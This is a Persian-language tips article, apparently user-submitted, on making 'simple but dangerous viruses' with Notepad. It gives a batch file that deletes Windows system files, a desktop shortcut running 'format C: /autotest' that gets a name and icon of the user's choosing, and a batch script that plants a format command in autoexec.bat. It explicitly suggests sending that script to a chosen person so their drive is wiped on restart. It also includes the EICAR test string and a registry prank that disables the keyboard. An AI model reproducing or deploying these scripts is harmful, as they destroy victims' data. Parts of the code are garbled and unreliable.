ترفند های امنیتی (بخش دوم)

ساخت ویروسی ساده ولی خطرناک!
 

قصد داریم ترفندی خطرناک (!) را به شما معرفی کنیم که با استفاده از آن می توانید بدون نیاز به نرم افزار خاصی و تنها با استفاده از Notepad ویندوز ویروس خطرناکی بسازید. با اجرای این ویروس ، کامپیوتر مورد نظر Reset شده و دیگر ویندوز آن بالا نمیاید! لازم به ذکر است که این ترفند تنها جنبه آموزشی داشته و هر گونه استفاده نابجا از آن به عهده خود فرد میباشد.
ابتدا Notepad ویندوز را باز کنيد. سپس اين عبارت زیر را در داخلش کپی کنید:
del autoexec.bat del config.sys cd winnt del system.ini del win.ini
سپس فايل رو با پسوند Bat . ذخیره کنيد.

ساخت یک ویروس ( تروجان ) ساده ولی خطرناک
 

اين ويروس چيز سختي نيست ولی خيلي خطرناكه و باعث میشه تنها با یک کلیک کل اطلاعات درايو مورد نظر پاک بشه.
اول از همه روي دسكتاپ رايت كليك كنيد بعدش New ShortCut بسازيد. يه صفحه باز ميشه در اون بنويسيد:
Format C:
/Autotest سپس Next را زده و در صفحه جديد كه باز ميشه يه اسم واسه ويروستون انتخاب كنيد.
سپس Next را زده ويه آيكون با سليقه خودتون براي اون انتخاب كرده و Finish كنيد. خب ديگه كارمون تمومه حالا اگه اجراش كنين بيچاره ميشين. اگه خواستين بفهمين چي ميشه به جاي Format C:
/autotest بنويسيد Format a:
/autotest و يه فلاپي كه حاوي اطلاعات هستش در Flopy Drive خود قرار دهيد بعد اجراش كنيد بعد برين سراغ فلاپيتون ببينيد چي شده.ميبينيد فلاپي پاك شده وديگه نه ميشه اطلاعات روش ريخت ونه ميشه فرمتش كرد .

ساخت یک ویروس کوچک برای فرمت کردن یک درایو مشخص
 

این بار قصد داریم برای شما یک ترفند خطرناک را بازگو کنیم که با استفاده از آن میتوانید از طریق Notepad ویندوز یک فایل بسازید و آن را برای شخص مورد نظر بفرستید. کافی است فرد مورد نظر فایل را یکبار اجرا کند و آنگاه یکی از درایوهای کامپیوتر فرد ، که شما آن را تعیین کرده اید فرمت خواهد شد!
بدین منظور:
ابتدا برنامه Notepad ویندوز را اجرا کنید ( Start/All Programs/Accessories )
سپس با استفاده از فرمان Copy Paste کدهای زیر را در محیط برنامه کپی کنید:

@ echo off
call attrib -r -h c:
autoexec.bat » nul
echo @echo off » c:
autoexec.bat
echo format /autotest c:
/q » nul »» c:
autoexec.bat
call attrib +r +h c:
autoexec.bat » nul
exit
 

حال از منوی File بر روی Save as کلیک کنید.
از منوی کشویی Save as type گزینه All Files را برگزینید.
در قسمت File Name عبارت txt .* را پاک کنید و به جای آن نام دلخواه خود را تایپ کرده و پسوند bat . را به انتهای آن اضافه کنید ، به طور مثال tarfandestan.bat
سپس مکان مورد نظر برای ذخیره فایل را مشخص کرده و روی دکمه Save کلیک کنید.
اکنون فایل فرمت شما آماده است. کافی است یکبار پس از اجرای فایل ، سیستم restart شود تا فایل فعال شود.
اما به چند نکته توجه کنید:
عبارتی که شما کپی کردید برای فرمت درایو C میباشد ، برای تعویض آن کافی است در خطوط 2 و 3 و 4 و 5 در جایی که نوشته است :
c به جای c نام درایو مورد نظر را بنویسید.
دقت هم کنید که ابدأ به روی فایلی که ساخته اید کلیک نکنید ، چرا که آن وقت باید با درایو خودتون خداحافظی کنید!
اما به نظر شما این فایل چگونه کار میکند؟
روش کار این فایل بدین شکل است که ابتدا محتویات فایل autoexe.bat که یک فایل ویندوزی است را پاک میکند و سپس کد format /autotest c:
/q را در داخلش جایگزین میکنه ، به همین سبب پس از رستارت کامپیوتر درایو شما فرمت میشود.

ساخت یک ویروس نما!
 

قصد داریم ترفندی متفاوت را به شما معرفی کنیم که با استفاده از آن میتوانید به راحتی و تایپ یک متن کوتاه در نرم افزار notepad ویروسی با نام Eicar بسازید. اين ويروس در حقيقت يك ويروس نماي استاندارد براي تست آنتي ويروسهاست. لازم به ذکر است اين ويروس يك ويروس واقعي نيست و در حقيقت يك ويروس نما است و فقط براي تست آنتي ويروس شما مثل يك ويروس عمل ميكند. ميتوانيد مطمئن باشيد كه eicar به هيچ وجه به سيستم شما آسيبي نخواهد رساند. براي تكميل توضيحات فوق بايد گفت EICAR مخفف عبارت European Institute for Computer Antivirus Research می باشد.
بدین منظور:
ابتدا Notepad را باز كنيد و عبارت زير را در آن وارد كنيد.
می توانید برای اطمینان و راحتی خودتان از Copy و Paste استفاده كنيد:
X5O!P%@AP[4PZX54(P^)7CC)7} EICAR-STANDARD-ANTIVIRUS-TEST-FILE! H+H *
سپس SaveAs را انتخاب و فايل را با پسوند com سيو كنيد يعني با نامي مثل eicar.com
به همین راحتی کار تمام است!

ساختن راحت یک ویروس شوخی!
 

امروز شما با ويروس Flicker آشنا ميشويد .البته شايد بعضي از شما آن را بشناسيد چون برنامه نسبتا معروفي است كه بيشتر براي شوخي كردن از آن استفاده ميشود.(البته Flicker بيشتر شباهت به يك برنامه اعصاب خوردكن دارد تا يك ويروس). Flicker در معني به معناي چشمك زن و سوسو زدن است و دليل اين نامگذاري اين است كه اين به اصطلاح ويروس كاري ميكند كه كاربر هرگاه دكمه اي از كيبرد را فشار دهد يك صداي بوق كه به آن اصطلاحا Beep گفته مشود از كامپيوتر شنيده ميشود و هم زمان با اين صدا صفحه مانيتور يكبار بطور سريع چشمك ميزند.و با اين وضع عملا كار با كيبورد امكاپذير نيست. لارم به ذکر است که طریقه غیرفعال کردن این ویروس نیز ذکر شده است.
اين ويروس از آن دسته است كه به كمك رجيستري كار ميكند.
خب حالا ميرسيم به شروع كار:
Notepad را باز كنيد و عبارت زير را در آن وارد كنيد

[ HKEY_CURRENT_USERControl PanelAccessibilityKeyboard Response ]
Flags = 127
[ HKEY_CURRENT_USERControl PanelAccessibilitySoundSentry ]
Flags = 3
WindowsEffect = 3
 

سپس آن را با پسوند Reg و با نامي مثل FlickerON.Reg سيو كنيد. حال يك فايل Notepad ديگر باز كنيد و عبارت زير را به منظور غيرفعال كردن ويروستان بسازيد.

Windows Registry Editor Version 5.00
[ HKEY_CURRENT_USERControl PanelAccessibilityKeyboard Response ]
Flags = 126
[ HKEY_CURRENT_USERControl PanelAccessibilitySoundSentry ]
Flags = 2
WindowsEffect = 0
 

و آن را هم به همان روش بالا ولي اين بار با نامي مثل FlickerOff.Reg سيو كنيد.
حال شما دو فايل رجيستري ساختيد كه با كليك كردن روي هركدام از آنها از شما اجازه گرفته و درون رجيستري Import ميشوند.حال براي امتحان روي FlickerOn كليك كنيد و وقتي Import شد كامپيوتر خود را Restart كنيد تا نحوه كارش را ببينيد.
مهم:
واضح است كه براي غير فعال كردن بايد همين كارها را با FlickerOff انجام دهيد با اين تفاوت كه شما در آن موقع فقط ميتوانيد از Mouse استفاده كنيد چون كيبورد شما كماكان غير قابل استفاده است!
لازم به ذكر است كه همه ويروسها مثل Flicker مستقيما به كمك رجيستري عمل نميكنند و روشهاي مختلفي براي كار دارند.
ارسال مقاله از طرف كاربر محترم سايت : zarei6703